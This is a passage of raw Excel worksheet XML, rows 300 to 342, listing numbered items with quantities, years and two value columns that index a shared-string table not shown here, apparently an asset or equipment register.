      <c r="F300" s="17"/>
      <c r="G300" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H300" s="11">
        <v>1</v>
      </c>
      <c r="I300" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J300" s="100">
        <v>300000</v>
      </c>
      <c r="K300" s="99">
        <v>31200</v>
      </c>
      <c r="L300" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M300" s="225"/>
    </row>
    <row r="301" ht="14.25" customHeight="1" spans="2:13">
      <c r="B301" s="16">
        <v>289</v>
      </c>
      <c r="C301" s="237" t="s">
        <v>940</v>
      </c>
      <c r="D301" s="238" t="s">
        <v>941</v>
      </c>
      <c r="E301" s="237" t="s">
        <v>942</v>
      </c>
      <c r="F301" s="17"/>
      <c r="G301" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H301" s="11">
        <v>1</v>
      </c>
      <c r="I301" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J301" s="100">
        <v>28700</v>
      </c>
      <c r="K301" s="99">
        <v>24000</v>
      </c>
      <c r="L301" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M301" s="225"/>
    </row>
    <row r="302" ht="14.25" customHeight="1" spans="2:13">
      <c r="B302" s="16">
        <v>290</v>
      </c>
      <c r="C302" s="237" t="s">
        <v>943</v>
      </c>
      <c r="D302" s="238" t="s">
        <v>944</v>
      </c>
      <c r="E302" s="237" t="s">
        <v>945</v>
      </c>
      <c r="F302" s="17"/>
      <c r="G302" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H302" s="11">
        <v>1</v>
      </c>
      <c r="I302" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J302" s="100">
        <v>2277000</v>
      </c>
      <c r="K302" s="99">
        <v>252000</v>
      </c>
      <c r="L302" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M302" s="225"/>
    </row>
    <row r="303" s="175" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B303" s="16">
        <v>291</v>
      </c>
      <c r="C303" s="237" t="s">
        <v>946</v>
      </c>
      <c r="D303" s="238" t="s">
        <v>947</v>
      </c>
      <c r="E303" s="237" t="s">
        <v>948</v>
      </c>
      <c r="F303" s="201"/>
      <c r="G303" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H303" s="11">
        <v>1</v>
      </c>
      <c r="I303" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J303" s="100">
        <v>612000</v>
      </c>
      <c r="K303" s="99">
        <v>69600</v>
      </c>
      <c r="L303" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M303" s="225"/>
    </row>
    <row r="304" ht="14.25" customHeight="1" spans="2:13">
      <c r="B304" s="16">
        <v>292</v>
      </c>
      <c r="C304" s="237" t="s">
        <v>949</v>
      </c>
      <c r="D304" s="238" t="s">
        <v>950</v>
      </c>
      <c r="E304" s="11"/>
      <c r="F304" s="17"/>
      <c r="G304" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H304" s="11">
        <v>1</v>
      </c>
      <c r="I304" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J304" s="100">
        <v>768500</v>
      </c>
      <c r="K304" s="99">
        <v>62400</v>
      </c>
      <c r="L304" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M304" s="225"/>
    </row>
    <row r="305" ht="14.25" customHeight="1" spans="2:13">
      <c r="B305" s="16">
        <v>293</v>
      </c>
      <c r="C305" s="237" t="s">
        <v>951</v>
      </c>
      <c r="D305" s="238" t="s">
        <v>952</v>
      </c>
      <c r="E305" s="238" t="s">
        <v>953</v>
      </c>
      <c r="F305" s="9" t="s">
        <v>954</v>
      </c>
      <c r="G305" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H305" s="11">
        <v>2</v>
      </c>
      <c r="I305" s="237" t="s">
        <v>955</v>
      </c>
      <c r="J305" s="91">
        <v>211000</v>
      </c>
      <c r="K305" s="99">
        <v>30870</v>
      </c>
      <c r="L305" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M305" s="225"/>
    </row>
    <row r="306" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A306" s="176"/>
      <c r="B306" s="16">
        <v>294</v>
      </c>
      <c r="C306" s="237" t="s">
        <v>956</v>
      </c>
      <c r="D306" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E306" s="237" t="s">
        <v>957</v>
      </c>
      <c r="F306" s="201"/>
      <c r="G306" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H306" s="11">
        <v>1</v>
      </c>
      <c r="I306" s="237" t="s">
        <v>958</v>
      </c>
      <c r="J306" s="100">
        <v>64500</v>
      </c>
      <c r="K306" s="99">
        <v>0</v>
      </c>
      <c r="L306" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M306" s="225"/>
    </row>
    <row r="307" ht="14.25" customHeight="1" spans="2:13">
      <c r="B307" s="16">
        <v>295</v>
      </c>
      <c r="C307" s="237" t="s">
        <v>959</v>
      </c>
      <c r="D307" s="238" t="s">
        <v>960</v>
      </c>
      <c r="E307" s="238" t="s">
        <v>961</v>
      </c>
      <c r="F307" s="9" t="s">
        <v>495</v>
      </c>
      <c r="G307" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H307" s="11">
        <v>2</v>
      </c>
      <c r="I307" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J307" s="91">
        <v>207193.38</v>
      </c>
      <c r="K307" s="99">
        <v>27930</v>
      </c>
      <c r="L307" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M307" s="225"/>
    </row>
    <row r="308" ht="14.25" customHeight="1" spans="2:13">
      <c r="B308" s="16">
        <v>296</v>
      </c>
      <c r="C308" s="237" t="s">
        <v>963</v>
      </c>
      <c r="D308" s="238" t="s">
        <v>964</v>
      </c>
      <c r="E308" s="11"/>
      <c r="F308" s="17"/>
      <c r="G308" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H308" s="11">
        <v>1</v>
      </c>
      <c r="I308" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J308" s="100">
        <v>10000</v>
      </c>
      <c r="K308" s="99">
        <v>0</v>
      </c>
      <c r="L308" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M308" s="225"/>
    </row>
    <row r="309" ht="14.25" customHeight="1" spans="2:13">
      <c r="B309" s="16">
        <v>297</v>
      </c>
      <c r="C309" s="237" t="s">
        <v>966</v>
      </c>
      <c r="D309" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E309" s="237" t="s">
        <v>967</v>
      </c>
      <c r="F309" s="17"/>
      <c r="G309" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H309" s="11">
        <v>1</v>
      </c>
      <c r="I309" s="237" t="s">
        <v>968</v>
      </c>
      <c r="J309" s="100">
        <v>22632.28</v>
      </c>
      <c r="K309" s="99">
        <v>0</v>
      </c>
      <c r="L309" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M309" s="225"/>
    </row>
    <row r="310" ht="14.25" customHeight="1" spans="2:13">
      <c r="B310" s="16">
        <v>298</v>
      </c>
      <c r="C310" s="237" t="s">
        <v>969</v>
      </c>
      <c r="D310" s="238" t="s">
        <v>970</v>
      </c>
      <c r="E310" s="237" t="s">
        <v>971</v>
      </c>
      <c r="F310" s="17"/>
      <c r="G310" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H310" s="11">
        <v>1</v>
      </c>
      <c r="I310" s="237" t="s">
        <v>972</v>
      </c>
      <c r="J310" s="100">
        <v>59160</v>
      </c>
      <c r="K310" s="99">
        <v>87360</v>
      </c>
      <c r="L310" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M310" s="225"/>
    </row>
    <row r="311" ht="14.25" customHeight="1" spans="2:13">
      <c r="B311" s="16">
        <v>299</v>
      </c>
      <c r="C311" s="237" t="s">
        <v>973</v>
      </c>
      <c r="D311" s="238" t="s">
        <v>974</v>
      </c>
      <c r="E311" s="237" t="s">
        <v>975</v>
      </c>
      <c r="F311" s="17"/>
      <c r="G311" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H311" s="11">
        <v>1</v>
      </c>
      <c r="I311" s="237" t="s">
        <v>972</v>
      </c>
      <c r="J311" s="100">
        <v>9700</v>
      </c>
      <c r="K311" s="99">
        <v>1629.6</v>
      </c>
      <c r="L311" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M311" s="225"/>
    </row>
    <row r="312" ht="14.25" customHeight="1" spans="2:13">
      <c r="B312" s="16">
        <v>300</v>
      </c>
      <c r="C312" s="237" t="s">
        <v>976</v>
      </c>
      <c r="D312" s="238" t="s">
        <v>977</v>
      </c>
      <c r="E312" s="237" t="s">
        <v>971</v>
      </c>
      <c r="F312" s="17"/>
      <c r="G312" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H312" s="11">
        <v>1</v>
      </c>
      <c r="I312" s="237" t="s">
        <v>978</v>
      </c>
      <c r="J312" s="100">
        <v>58163</v>
      </c>
      <c r="K312" s="99">
        <v>87360</v>
      </c>
      <c r="L312" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M312" s="225"/>
    </row>
    <row r="313" ht="14.25" customHeight="1" spans="2:13">
      <c r="B313" s="16">
        <v>301</v>
      </c>
      <c r="C313" s="237" t="s">
        <v>979</v>
      </c>
      <c r="D313" s="238" t="s">
        <v>980</v>
      </c>
      <c r="E313" s="237" t="s">
        <v>981</v>
      </c>
      <c r="F313" s="17"/>
      <c r="G313" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H313" s="11">
        <v>1</v>
      </c>
      <c r="I313" s="237" t="s">
        <v>982</v>
      </c>
      <c r="J313" s="100">
        <v>90400</v>
      </c>
      <c r="K313" s="99">
        <v>0</v>
      </c>
      <c r="L313" s="239" t="s">
        <v>912</v>
      </c>
      <c r="M313" s="225"/>
    </row>
    <row r="314" ht="14.25" customHeight="1" spans="2:13">
      <c r="B314" s="16">
        <v>302</v>
      </c>
      <c r="C314" s="11"/>
      <c r="D314" s="10" t="s">
        <v>983</v>
      </c>
      <c r="E314" s="10" t="s">
        <v>984</v>
      </c>
      <c r="F314" s="9" t="s">
        <v>985</v>
      </c>
      <c r="G314" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H314" s="11">
        <v>2</v>
      </c>
      <c r="I314" s="11">
        <v>1997</v>
      </c>
      <c r="J314" s="91"/>
      <c r="K314" s="99">
        <v>14000</v>
      </c>
      <c r="L314" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M314" s="225"/>
    </row>
    <row r="315" ht="14.25" customHeight="1" spans="2:13">
      <c r="B315" s="16">
        <v>303</v>
      </c>
      <c r="C315" s="11"/>
      <c r="D315" s="10" t="s">
        <v>986</v>
      </c>
      <c r="E315" s="10" t="s">
        <v>987</v>
      </c>
      <c r="F315" s="9" t="s">
        <v>988</v>
      </c>
      <c r="G315" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H315" s="11">
        <v>2</v>
      </c>
      <c r="I315" s="11">
        <v>1997</v>
      </c>
      <c r="J315" s="91"/>
      <c r="K315" s="99">
        <v>3200</v>
      </c>
      <c r="L315" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M315" s="225"/>
    </row>
    <row r="316" ht="14.25" customHeight="1" spans="2:13">
      <c r="B316" s="16">
        <v>304</v>
      </c>
      <c r="C316" s="11"/>
      <c r="D316" s="10" t="s">
        <v>989</v>
      </c>
      <c r="E316" s="10"/>
      <c r="F316" s="9"/>
      <c r="G316" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H316" s="11">
        <v>1</v>
      </c>
      <c r="I316" s="11">
        <v>1997</v>
      </c>
      <c r="J316" s="91"/>
      <c r="K316" s="99">
        <v>20000</v>
      </c>
      <c r="L316" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M316" s="225"/>
    </row>
    <row r="317" ht="14.25" customHeight="1" spans="2:13">
      <c r="B317" s="16">
        <v>305</v>
      </c>
      <c r="C317" s="11"/>
      <c r="D317" s="10" t="s">
        <v>990</v>
      </c>
      <c r="E317" s="10" t="s">
        <v>342</v>
      </c>
      <c r="F317" s="9"/>
      <c r="G317" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H317" s="11">
        <v>1</v>
      </c>
      <c r="I317" s="11">
        <v>1997</v>
      </c>
      <c r="J317" s="91"/>
      <c r="K317" s="99">
        <v>1920</v>
      </c>
      <c r="L317" s="238" t="s">
        <v>912</v>
      </c>
      <c r="M317" s="225"/>
    </row>
    <row r="318" ht="14.25" customHeight="1" spans="2:13">
      <c r="B318" s="226" t="s">
        <v>991</v>
      </c>
      <c r="C318" s="227"/>
      <c r="D318" s="228"/>
      <c r="E318" s="10"/>
      <c r="F318" s="14"/>
      <c r="G318" s="11"/>
      <c r="H318" s="11"/>
      <c r="I318" s="11"/>
      <c r="J318" s="91"/>
      <c r="K318" s="99">
        <v>0</v>
      </c>
      <c r="L318" s="10"/>
      <c r="M318" s="225"/>
    </row>
    <row r="319" ht="14.25" customHeight="1" spans="2:13">
      <c r="B319" s="11">
        <v>306</v>
      </c>
      <c r="C319" s="237" t="s">
        <v>992</v>
      </c>
      <c r="D319" s="238" t="s">
        <v>993</v>
      </c>
      <c r="E319" s="238" t="s">
        <v>994</v>
      </c>
      <c r="F319" s="14"/>
      <c r="G319" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H319" s="11">
        <v>2</v>
      </c>
      <c r="I319" s="237" t="s">
        <v>995</v>
      </c>
      <c r="J319" s="91">
        <v>35897.44</v>
      </c>
      <c r="K319" s="99">
        <v>20160</v>
      </c>
      <c r="L319" s="238" t="s">
        <v>996</v>
      </c>
      <c r="M319" s="225"/>
    </row>
    <row r="320" ht="14.25" customHeight="1" spans="1:13">
      <c r="A320" s="175"/>
      <c r="B320" s="16">
        <v>307</v>
      </c>
      <c r="C320" s="237" t="s">
        <v>997</v>
      </c>
      <c r="D320" s="238" t="s">
        <v>998</v>
      </c>
      <c r="E320" s="237" t="s">
        <v>999</v>
      </c>
      <c r="F320" s="17"/>
      <c r="G320" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H320" s="11">
        <v>2</v>
      </c>
      <c r="I320" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J320" s="100">
        <v>44000</v>
      </c>
      <c r="K320" s="99">
        <v>7360</v>
      </c>
      <c r="L320" s="239" t="s">
        <v>1001</v>
      </c>
      <c r="M320" s="225"/>
    </row>
    <row r="321" ht="14.25" customHeight="1" spans="2:13">
      <c r="B321" s="16">
        <v>308</v>
      </c>
      <c r="C321" s="237" t="s">
        <v>1002</v>
      </c>
      <c r="D321" s="238" t="s">
        <v>1003</v>
      </c>
      <c r="E321" s="237" t="s">
        <v>1004</v>
      </c>
      <c r="F321" s="17"/>
      <c r="G321" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H321" s="11">
        <v>2</v>
      </c>
      <c r="I321" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J321" s="100">
        <v>190000</v>
      </c>
      <c r="K321" s="99">
        <v>33600</v>
      </c>
      <c r="L321" s="239" t="s">
        <v>1001</v>
      </c>
      <c r="M321" s="225"/>
    </row>
    <row r="322" ht="14.25" customHeight="1" spans="2:13">
      <c r="B322" s="16">
        <v>309</v>
      </c>
      <c r="C322" s="237" t="s">
        <v>1005</v>
      </c>
      <c r="D322" s="238" t="s">
        <v>1006</v>
      </c>
      <c r="E322" s="237" t="s">
        <v>1007</v>
      </c>
      <c r="F322" s="17"/>
      <c r="G322" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H322" s="11">
        <v>1</v>
      </c>
      <c r="I322" s="237" t="s">
        <v>1008</v>
      </c>
      <c r="J322" s="100">
        <v>94017.09</v>
      </c>
      <c r="K322" s="99">
        <v>29328</v>
      </c>
      <c r="L322" s="239" t="s">
        <v>1009</v>
      </c>
      <c r="M322" s="225"/>
    </row>
    <row r="323" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A323" s="176"/>
      <c r="B323" s="16">
        <v>310</v>
      </c>
      <c r="C323" s="237" t="s">
        <v>1010</v>
      </c>
      <c r="D323" s="238" t="s">
        <v>1011</v>
      </c>
      <c r="E323" s="237" t="s">
        <v>1012</v>
      </c>
      <c r="F323" s="201"/>
      <c r="G323" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H323" s="11">
        <v>1</v>
      </c>
      <c r="I323" s="237" t="s">
        <v>1013</v>
      </c>
      <c r="J323" s="100">
        <v>2600</v>
      </c>
      <c r="K323" s="99">
        <v>0</v>
      </c>
      <c r="L323" s="239" t="s">
        <v>1014</v>
      </c>
      <c r="M323" s="225"/>
    </row>
    <row r="324" ht="14.25" customHeight="1" spans="2:13">
      <c r="B324" s="16">
        <v>311</v>
      </c>
      <c r="C324" s="11"/>
      <c r="D324" s="10" t="s">
        <v>1015</v>
      </c>
      <c r="E324" s="10" t="s">
        <v>1016</v>
      </c>
      <c r="F324" s="14"/>
      <c r="G324" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H324" s="11">
        <v>1</v>
      </c>
      <c r="I324" s="11"/>
      <c r="J324" s="91"/>
      <c r="K324" s="99">
        <v>0</v>
      </c>
      <c r="L324" s="238" t="s">
        <v>996</v>
      </c>
      <c r="M324" s="225"/>
    </row>
    <row r="325" ht="14.25" customHeight="1" spans="2:13">
      <c r="B325" s="226" t="s">
        <v>1017</v>
      </c>
      <c r="C325" s="227"/>
      <c r="D325" s="228"/>
      <c r="E325" s="10"/>
      <c r="F325" s="14"/>
      <c r="G325" s="11"/>
      <c r="H325" s="11"/>
      <c r="I325" s="11"/>
      <c r="J325" s="91"/>
      <c r="K325" s="99">
        <v>0</v>
      </c>
      <c r="L325" s="10"/>
      <c r="M325" s="225"/>
    </row>
    <row r="326" ht="14.25" customHeight="1" spans="2:13">
      <c r="B326" s="11">
        <v>312</v>
      </c>
      <c r="C326" s="237" t="s">
        <v>1018</v>
      </c>
      <c r="D326" s="238" t="s">
        <v>1019</v>
      </c>
      <c r="E326" s="238" t="s">
        <v>1020</v>
      </c>
      <c r="F326" s="14"/>
      <c r="G326" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H326" s="11">
        <v>2</v>
      </c>
      <c r="I326" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J326" s="91">
        <v>29790</v>
      </c>
      <c r="K326" s="99">
        <v>10672</v>
      </c>
      <c r="L326" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M326" s="225"/>
    </row>
    <row r="327" ht="14.25" customHeight="1" spans="2:13">
      <c r="B327" s="11">
        <v>313</v>
      </c>
      <c r="C327" s="237" t="s">
        <v>1023</v>
      </c>
      <c r="D327" s="238" t="s">
        <v>1024</v>
      </c>
      <c r="E327" s="238" t="s">
        <v>1025</v>
      </c>
      <c r="F327" s="14"/>
      <c r="G327" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H327" s="11">
        <v>1</v>
      </c>
      <c r="I327" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J327" s="91">
        <v>73467</v>
      </c>
      <c r="K327" s="99">
        <v>12512</v>
      </c>
      <c r="L327" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M327" s="225"/>
    </row>
    <row r="328" ht="14.25" customHeight="1" spans="1:13">
      <c r="A328" s="175"/>
      <c r="B328" s="11">
        <v>314</v>
      </c>
      <c r="C328" s="237" t="s">
        <v>1026</v>
      </c>
      <c r="D328" s="238" t="s">
        <v>1027</v>
      </c>
      <c r="E328" s="238" t="s">
        <v>1028</v>
      </c>
      <c r="F328" s="14"/>
      <c r="G328" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H328" s="11">
        <v>1</v>
      </c>
      <c r="I328" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J328" s="91">
        <v>107523</v>
      </c>
      <c r="K328" s="99">
        <v>16376</v>
      </c>
      <c r="L328" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M328" s="225"/>
    </row>
    <row r="329" ht="14.25" customHeight="1" spans="2:13">
      <c r="B329" s="11">
        <v>315</v>
      </c>
      <c r="C329" s="237" t="s">
        <v>1029</v>
      </c>
      <c r="D329" s="238" t="s">
        <v>1030</v>
      </c>
      <c r="E329" s="238" t="s">
        <v>1031</v>
      </c>
      <c r="F329" s="14"/>
      <c r="G329" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H329" s="11">
        <v>1</v>
      </c>
      <c r="I329" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J329" s="91">
        <v>48465</v>
      </c>
      <c r="K329" s="99">
        <v>8280</v>
      </c>
      <c r="L329" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M329" s="225"/>
    </row>
    <row r="330" ht="14.25" customHeight="1" spans="2:13">
      <c r="B330" s="11">
        <v>316</v>
      </c>
      <c r="C330" s="237" t="s">
        <v>1032</v>
      </c>
      <c r="D330" s="238" t="s">
        <v>1033</v>
      </c>
      <c r="E330" s="238" t="s">
        <v>1034</v>
      </c>
      <c r="F330" s="14"/>
      <c r="G330" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H330" s="11">
        <v>11</v>
      </c>
      <c r="I330" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J330" s="91">
        <v>1862818.97</v>
      </c>
      <c r="K330" s="99">
        <v>331200</v>
      </c>
      <c r="L330" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M330" s="225"/>
    </row>
    <row r="331" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A331" s="176"/>
      <c r="B331" s="11">
        <v>317</v>
      </c>
      <c r="C331" s="237" t="s">
        <v>1036</v>
      </c>
      <c r="D331" s="238" t="s">
        <v>1037</v>
      </c>
      <c r="E331" s="113"/>
      <c r="F331" s="196"/>
      <c r="G331" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H331" s="11">
        <v>1</v>
      </c>
      <c r="I331" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J331" s="100">
        <v>4000</v>
      </c>
      <c r="K331" s="99">
        <v>0</v>
      </c>
      <c r="L331" s="239" t="s">
        <v>1022</v>
      </c>
      <c r="M331" s="225"/>
    </row>
    <row r="332" ht="14.25" customHeight="1" spans="2:13">
      <c r="B332" s="11">
        <v>318</v>
      </c>
      <c r="C332" s="90" t="s">
        <v>1038</v>
      </c>
      <c r="D332" s="9" t="s">
        <v>980</v>
      </c>
      <c r="E332" s="9"/>
      <c r="F332" s="17"/>
      <c r="G332" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H332" s="16">
        <v>4</v>
      </c>
      <c r="I332" s="16">
        <v>2002</v>
      </c>
      <c r="J332" s="91">
        <v>380000</v>
      </c>
      <c r="K332" s="99">
        <v>0</v>
      </c>
      <c r="L332" s="96" t="s">
        <v>1039</v>
      </c>
      <c r="M332" s="225"/>
    </row>
    <row r="333" ht="14.25" customHeight="1" spans="2:13">
      <c r="B333" s="11">
        <v>319</v>
      </c>
      <c r="C333" s="237" t="s">
        <v>1040</v>
      </c>
      <c r="D333" s="238" t="s">
        <v>1041</v>
      </c>
      <c r="E333" s="10"/>
      <c r="F333" s="14"/>
      <c r="G333" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H333" s="11">
        <v>2</v>
      </c>
      <c r="I333" s="237" t="s">
        <v>825</v>
      </c>
      <c r="J333" s="91">
        <v>10683.76</v>
      </c>
      <c r="K333" s="99">
        <v>4160</v>
      </c>
      <c r="L333" s="238" t="s">
        <v>1042</v>
      </c>
      <c r="M333" s="225"/>
    </row>
    <row r="334" ht="14.25" customHeight="1" spans="2:13">
      <c r="B334" s="11">
        <v>320</v>
      </c>
      <c r="C334" s="237" t="s">
        <v>1043</v>
      </c>
      <c r="D334" s="238" t="s">
        <v>1044</v>
      </c>
      <c r="E334" s="238" t="s">
        <v>1045</v>
      </c>
      <c r="F334" s="14"/>
      <c r="G334" s="11"/>
      <c r="H334" s="11"/>
      <c r="I334" s="237" t="s">
        <v>1046</v>
      </c>
      <c r="J334" s="91">
        <v>9000</v>
      </c>
      <c r="K334" s="99">
        <v>3384</v>
      </c>
      <c r="L334" s="238" t="s">
        <v>1047</v>
      </c>
      <c r="M334" s="225"/>
    </row>
    <row r="335" ht="14.25" customHeight="1" spans="2:13">
      <c r="B335" s="11">
        <v>321</v>
      </c>
      <c r="C335" s="237" t="s">
        <v>1048</v>
      </c>
      <c r="D335" s="238" t="s">
        <v>1033</v>
      </c>
      <c r="E335" s="238" t="s">
        <v>1049</v>
      </c>
      <c r="F335" s="9" t="s">
        <v>1050</v>
      </c>
      <c r="G335" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H335" s="11">
        <v>16</v>
      </c>
      <c r="I335" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J335" s="91">
        <v>977008</v>
      </c>
      <c r="K335" s="99">
        <v>174800</v>
      </c>
      <c r="L335" s="10" t="s">
        <v>1022</v>
      </c>
      <c r="M335" s="225"/>
    </row>
    <row r="336" ht="14.25" customHeight="1" spans="2:13">
      <c r="B336" s="11">
        <v>322</v>
      </c>
      <c r="C336" s="11"/>
      <c r="D336" s="10" t="s">
        <v>1051</v>
      </c>
      <c r="E336" s="10" t="s">
        <v>1052</v>
      </c>
      <c r="F336" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G336" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H336" s="11">
        <v>1</v>
      </c>
      <c r="I336" s="11">
        <v>2004</v>
      </c>
      <c r="J336" s="91"/>
      <c r="K336" s="99">
        <v>10080</v>
      </c>
      <c r="L336" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M336" s="225"/>
    </row>
    <row r="337" ht="14.25" customHeight="1" spans="2:13">
      <c r="B337" s="11">
        <v>323</v>
      </c>
      <c r="C337" s="11"/>
      <c r="D337" s="10" t="s">
        <v>681</v>
      </c>
      <c r="E337" s="10" t="s">
        <v>682</v>
      </c>
      <c r="F337" s="9" t="s">
        <v>1053</v>
      </c>
      <c r="G337" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H337" s="11">
        <v>1</v>
      </c>
      <c r="I337" s="11">
        <v>2006</v>
      </c>
      <c r="J337" s="91"/>
      <c r="K337" s="99">
        <v>41600</v>
      </c>
      <c r="L337" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M337" s="225"/>
    </row>
    <row r="338" ht="14.25" customHeight="1" spans="1:13">
      <c r="A338" s="211"/>
      <c r="B338" s="11">
        <v>324</v>
      </c>
      <c r="C338" s="11"/>
      <c r="D338" s="10" t="s">
        <v>681</v>
      </c>
      <c r="E338" s="10" t="s">
        <v>1054</v>
      </c>
      <c r="F338" s="9" t="s">
        <v>1055</v>
      </c>
      <c r="G338" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H338" s="11">
        <v>5</v>
      </c>
      <c r="I338" s="11">
        <v>2004</v>
      </c>
      <c r="J338" s="91"/>
      <c r="K338" s="99">
        <v>84000</v>
      </c>
      <c r="L338" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M338" s="225"/>
    </row>
    <row r="339" ht="14.25" customHeight="1" spans="2:13">
      <c r="B339" s="11">
        <v>325</v>
      </c>
      <c r="C339" s="11"/>
      <c r="D339" s="10" t="s">
        <v>1056</v>
      </c>
      <c r="E339" s="10" t="s">
        <v>1057</v>
      </c>
      <c r="F339" s="9" t="s">
        <v>1058</v>
      </c>
      <c r="G339" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H339" s="11">
        <v>2</v>
      </c>
      <c r="I339" s="11">
        <v>2005</v>
      </c>
      <c r="J339" s="91"/>
      <c r="K339" s="99">
        <v>55200</v>
      </c>
      <c r="L339" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M339" s="225"/>
    </row>
    <row r="340" ht="14.25" customHeight="1" spans="2:13">
      <c r="B340" s="11">
        <v>326</v>
      </c>
      <c r="C340" s="11"/>
      <c r="D340" s="10" t="s">
        <v>681</v>
      </c>
      <c r="E340" s="10" t="s">
        <v>1059</v>
      </c>
      <c r="F340" s="9" t="s">
        <v>1053</v>
      </c>
      <c r="G340" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H340" s="11">
        <v>1</v>
      </c>
      <c r="I340" s="11">
        <v>2006</v>
      </c>
      <c r="J340" s="91"/>
      <c r="K340" s="99">
        <v>37800</v>
      </c>
      <c r="L340" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M340" s="225"/>
    </row>
    <row r="341" s="211" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A341" s="176"/>
      <c r="B341" s="11">
        <v>327</v>
      </c>
      <c r="C341" s="11"/>
      <c r="D341" s="10" t="s">
        <v>1060</v>
      </c>
      <c r="E341" s="10" t="s">
        <v>1061</v>
      </c>
      <c r="F341" s="9"/>
      <c r="G341" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H341" s="11">
        <v>1</v>
      </c>
      <c r="I341" s="11">
        <v>2006</v>
      </c>
      <c r="J341" s="91"/>
      <c r="K341" s="99">
        <v>420000</v>
      </c>
      <c r="L341" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M341" s="225"/>
    </row>
    <row r="342" ht="14.25" customHeight="1" spans="2:13">
      <c r="B342" s="11">
        <v>328</v>
      </c>
      <c r="C342" s="11"/>
      <c r="D342" s="10" t="s">
        <v>1062</v>
      </c>
      <c r="E342" s="10" t="s">
        <v>1063</v>
      </c>
      <c r="F342" s="9"/>
      <c r="G342" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H342" s="11">
        <v>4</v>
      </c>
      <c r="I342" s="11">
        <v>2006</v>
      </c>
      <c r="J342" s="91"/>
      <c r="K342" s="99">
        <v>33600</v>
      </c>
      <c r="L342" s="238" t="s">
        <v>1022</v>
      </c>
      <c r="M342" s="225"/>
    </row>
